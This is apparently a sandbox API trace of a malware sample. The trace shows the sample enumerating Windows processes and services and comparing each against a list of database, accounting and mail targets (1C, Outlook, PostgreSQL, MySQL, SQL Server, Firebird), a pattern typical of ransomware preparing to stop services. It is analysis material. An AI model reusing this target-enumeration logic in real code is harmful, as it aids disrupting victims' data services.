	[0142.248] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0142.248] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0142.248] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0142.248] lstrlenW (lpString="ProfSvc") returned 7
	[0142.248] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0142.248] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0142.248] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0142.248] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0142.248] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0142.248] lstrlenW (lpString="RpcEptMapper") returned 12
	[0142.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0142.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0142.249] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0142.249] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0142.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0142.249] lstrlenW (lpString="RpcSs") returned 5
	[0142.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0142.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0142.249] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0142.249] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0142.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0142.249] lstrlenW (lpString="SamSs") returned 5
	[0142.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0142.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0142.249] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0142.249] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0142.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0142.249] lstrlenW (lpString="Schedule") returned 8
	[0142.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0142.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0142.249] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0142.249] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0142.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0142.249] lstrlenW (lpString="SENS") returned 4
	[0142.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0142.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0142.249] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0142.249] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0142.249] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0142.249] lstrlenW (lpString="ShellHWDetection") returned 16
	[0142.249] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0142.249] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0142.249] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0142.250] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0142.250] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0142.250] lstrlenW (lpString="Spooler") returned 7
	[0142.250] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0142.250] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0142.250] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0142.250] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0142.250] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0142.250] lstrlenW (lpString="Themes") returned 6
	[0142.250] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0142.250] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0142.250] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0142.250] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0142.250] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0142.250] lstrlenW (lpString="UxSms") returned 5
	[0142.250] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0142.250] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0142.250] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0142.250] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0142.250] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0142.250] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0142.250] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3c0
	[0142.252] Process32FirstW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0142.252] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0142.253] lstrlenW (lpString="System") returned 6
	[0142.253] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0142.253] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0142.253] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0142.253] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0142.253] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0142.253] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0142.253] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0142.253] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0142.253] lstrlenW (lpString="smss.exe") returned 8
	[0142.253] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0142.253] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0142.253] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0142.253] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0142.253] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0142.253] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0142.253] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0142.253] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0142.254] lstrlenW (lpString="csrss.exe") returned 9
	[0142.254] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0142.254] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0142.254] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0142.254] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0142.254] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0142.254] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0142.254] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0142.254] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0142.254] lstrlenW (lpString="wininit.exe") returned 11
	[0142.254] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0142.254] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0142.254] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0142.254] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0142.254] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0142.254] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0142.254] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0142.255] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0142.255] lstrlenW (lpString="csrss.exe") returned 9
	[0142.255] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0142.255] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0142.255] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0142.255] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0142.255] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0142.255] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0142.255] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0142.255] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0142.255] lstrlenW (lpString="winlogon.exe") returned 12
	[0142.255] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0142.255] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0142.255] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0142.255] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0142.255] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0142.255] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0142.255] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0142.256] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0142.256] lstrlenW (lpString="services.exe") returned 12
	[0142.256] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0142.256] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0142.256] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0142.256] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0142.256] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0142.256] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0142.256] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0142.256] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0142.256] lstrlenW (lpString="lsass.exe") returned 9
	[0142.256] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0142.256] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0142.256] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0142.256] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0142.256] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0142.256] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0142.257] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0142.257] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0142.257] lstrlenW (lpString="lsm.exe") returned 7
	[0142.257] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0142.257] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0142.257] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0142.257] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0142.257] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0142.257] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0142.257] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0142.257] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.257] lstrlenW (lpString="svchost.exe") returned 11
	[0142.257] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0142.257] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0142.257] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0142.257] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0142.257] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0142.257] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0142.258] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0142.258] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.258] lstrlenW (lpString="svchost.exe") returned 11
	[0142.258] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0142.258] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0142.258] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0142.258] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0142.258] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0142.258] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0142.258] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0142.258] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.258] lstrlenW (lpString="svchost.exe") returned 11
	[0142.258] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0142.258] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0142.258] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0142.258] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0142.258] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0142.259] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0142.259] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0142.259] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.259] lstrlenW (lpString="svchost.exe") returned 11
	[0142.259] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0142.259] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0142.259] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0142.259] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0142.259] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0142.259] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0142.259] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0142.259] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.259] lstrlenW (lpString="svchost.exe") returned 11
	[0142.259] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0142.259] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0142.259] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0142.260] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0142.260] lstrlenW (lpString="audiodg.exe") returned 11
	[0142.260] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.260] lstrlenW (lpString="svchost.exe") returned 11
	[0142.260] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.260] lstrlenW (lpString="svchost.exe") returned 11
	[0142.260] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0142.261] lstrlenW (lpString="spoolsv.exe") returned 11
	[0142.261] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0142.261] lstrlenW (lpString="svchost.exe") returned 11
	[0142.261] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0142.261] lstrlenW (lpString="taskhost.exe") returned 12
	[0142.261] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0142.262] lstrlenW (lpString="userinit.exe") returned 12
	[0142.262] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0142.262] lstrlenW (lpString="dwm.exe") returned 7
	[0142.262] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0142.262] lstrlenW (lpString="explorer.exe") returned 12
	[0142.262] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0142.263] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0142.263] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0142.263] lstrlenW (lpString="reader_sl.exe") returned 13
	[0142.263] Process32NextW (in: hSnapshot=0x3c0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0142.264] CloseHandle (hObject=0x3c0) returned 1
	[0142.264] Sleep (dwMilliseconds=0x1f4) 
	[0142.805] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb51c670
	[0142.824] EnumServicesStatusExW (in: hSCManager=0xb51c670, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0142.825] GetLastError () returned 0xea
	[0142.825] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0142.825] EnumServicesStatusExW (in: hSCManager=0xb51c670, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0142.825] CloseServiceHandle (hSCObject=0xb51c670) returned 1
	[0142.825] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0142.825] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0142.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0142.826] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0142.826] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0142.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0142.826] lstrlenW (lpString="AudioSrv") returned 8
	[0142.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0142.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0142.826] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0142.826] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0142.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0142.826] lstrlenW (lpString="BFE") returned 3
	[0142.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0142.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0142.826] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0142.826] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0142.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0142.826] lstrlenW (lpString="CryptSvc") returned 8
	[0142.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0142.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0142.826] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0142.826] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0142.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0142.826] lstrlenW (lpString="CscService") returned 10
	[0142.826] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0142.826] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0142.826] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0142.826] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0142.826] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0142.826] lstrlenW (lpString="DcomLaunch") returned 10
